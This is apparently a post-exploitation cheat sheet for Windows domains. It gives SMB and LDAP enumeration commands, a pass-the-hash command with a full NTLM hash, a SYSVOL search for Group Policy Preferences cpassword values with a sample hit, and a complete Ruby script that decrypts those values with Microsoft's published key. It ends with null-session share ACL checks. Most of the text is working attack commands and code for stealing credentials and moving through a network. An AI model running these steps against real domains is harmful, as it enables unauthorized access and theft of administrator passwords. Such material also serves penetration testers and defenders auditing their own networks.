Windows Enumeration - Post Exploitation



Enumerate SMB shares from the attacking box (a null session is enough where the host allows it):

nmap --script smb-enum-shares.nse -p445 IP

Pull users, groups, shares and the password policy over SMB/RPC in one pass:

enum4linux -a IP
 
 

Browse any readable shares for passwords. On the domain controller, check SYSVOL (readable by every domain user) for Group Policy Preferences (GPP) files that carry a cpassword attribute: Groups.xml is the classic one, but Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can hold one too. The value is AES-256 encrypted with a key Microsoft published in the MS-GPPREF specification, so it decrypts offline. MS14-025 stopped new cpassword values from being written but did not remove existing ones, so old policies are still worth checking. First get a session on the domain with the harvested NTLM hash (pass-the-hash via Windows Credentials Editor; the LM half aad3b435b51404eeaad3b435b51404ee is the empty LM hash), then search SYSVOL:
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f

C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>

Decrypt the cpassword value offline (the second line is the recovered password):

C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
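The gppdecrypt.rb step above, as an added example that is not the script the page runs and not part of the original post: it implements the same decryption (base64 with its stripped padding restored, AES-256-CBC with the key published in MS-GPPREF and an all-zero IV, then UTF-16LE to text), scans a Groups.xml body for every element carrying a cpassword attribute, and, so the result can be checked offline, also includes the reverse operation to encrypt a known password the way GPP does. The SAMPLE_GROUPS_XML body, the account name svc_backup and the function names are constructed for this example.

```ruby
require 'openssl'
require 'base64'

# 32-byte AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4.
GPP_KEY = [
  0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
  0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b
].pack('C*')
GPP_IV = "\x00" * 16   # GPP uses an all-zero IV

# Decrypt a cpassword attribute value. GPP strips the base64 '=' padding,
# so it is restored before decoding. Returns nil for an empty attribute.
def gpp_decrypt(cpassword)
  return nil if cpassword.nil? || cpassword.empty?
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = Base64.strict_decode64(padded)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_KEY
  cipher.iv = GPP_IV
  plain = cipher.update(ciphertext) + cipher.final   # PKCS#7 padding removed by final
  plain.force_encoding('UTF-16LE').encode('UTF-8')   # GPP stores the password as UTF-16LE
end

# Reverse operation, used here only to build test data (constructed helper,
# not something the original tooling provides).
def gpp_encrypt(password)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.encrypt
  cipher.key = GPP_KEY
  cipher.iv = GPP_IV
  ciphertext = cipher.update(password.encode('UTF-16LE')) + cipher.final
  Base64.strict_encode64(ciphertext).delete('=')     # GPP drops the '=' padding
end

# Find every element with a cpassword attribute in a GPP XML body and decrypt it.
# A plain scan is used rather than an XML parser so this runs with no dependencies.
def find_gpp_passwords(xml)
  xml.scan(/<\w+\b[^>]*\bcpassword="[^"]*"[^>]*>/).map do |tag|
    cpw  = tag[/\bcpassword="([^"]*)"/, 1]
    user = tag[/\buserName="([^"]*)"/, 1]
    { user: user, cpassword: cpw, password: gpp_decrypt(cpw) }
  end
end

# Constructed Groups.xml sample in the layout SYSVOL uses; the cpassword is
# produced by gpp_encrypt so the expected result is known.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" changed="2014-05-01 10:00:00">
      <Properties action="U" newName="" fullName="" description="" cpassword="#{gpp_encrypt('1q2w3e4r5t')}" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="svc_backup"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  if ARGV.empty?
    # ruby gpp_decrypt.rb            -> decrypts the built-in sample
    find_gpp_passwords(SAMPLE_GROUPS_XML).each { |h| puts "#{h[:user]} : #{h[:password]}" }
  else
    # ruby gpp_decrypt.rb <cpassword> -> decrypts a value copied from SYSVOL
    puts gpp_decrypt(ARGV[0])
  end
end
```

Pointing find_gpp_passwords at the contents of every *.xml under the Policies tree covers the other GPP file types as well, since they all use the same cpassword attribute and key.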
 

=============================================================================

If LDAP is open (TCP 389), an anonymous bind usually returns the rootDSE, whose namingContexts attribute lists the domain's base DNs to search next:

ldapsearch -x -h host_or_domain.local -s base namingcontexts

Newer OpenLDAP clients have deprecated -h in favour of a URI; the equivalent is:

ldapsearch -x -H ldap://host_or_domain.local -b '' -s base namingcontexts


Show the NT ACL on a file or directory inside a share (who can read, write or take ownership). -N skips the password prompt, i.e. a null session, so if this returns an ACL without credentials the share is exposed to anyone on the network:

smbcacls -N '//IP_or_HOSTNAME/share' /Users
